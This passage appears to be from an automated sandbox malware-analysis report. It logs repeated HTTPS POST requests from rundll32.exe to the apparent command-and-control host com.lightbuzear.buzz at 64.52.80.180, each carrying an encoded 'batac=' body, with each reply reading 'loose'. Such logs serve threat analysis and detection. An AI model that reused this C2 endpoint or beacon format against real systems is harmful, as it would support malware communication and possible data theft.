              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:32 UTC103INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:32 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:32 UTC103INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              62192.168.2.224923464.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:33 UTC103OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:33 UTC104OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:34 UTC105INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:33 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:34 UTC105INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              63192.168.2.224923564.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:34 UTC105OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:34 UTC105OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:35 UTC106INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:34 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:35 UTC107INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              64192.168.2.224923664.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:35 UTC107OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:35 UTC107OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:36 UTC108INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:36 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:36 UTC108INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              65192.168.2.224923764.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:36 UTC108OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:36 UTC109OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:37 UTC110INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:37 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:37 UTC110INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              66192.168.2.224923864.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:37 UTC110OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:37 UTC110OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:38 UTC111INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:38 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:38 UTC112INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              67192.168.2.224923964.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:38 UTC112OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:38 UTC112OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:39 UTC113INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:39 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:39 UTC113INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              68192.168.2.224924064.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:40 UTC113OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:40 UTC114OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:40 UTC115INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:40 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:40 UTC115INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              69192.168.2.224924164.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:41 UTC115OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:41 UTC115OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:41 UTC116INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:41 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:41 UTC116INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              7192.168.2.224917964.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:39:33 UTC13OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:39:33 UTC13OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:39:33 UTC14INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:39:33 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:39:33 UTC14INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              70192.168.2.224924264.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:42 UTC116OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:42 UTC117OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:42 UTC118INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:42 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:42 UTC118INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              71192.168.2.224924364.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:43 UTC118OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:43 UTC118OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
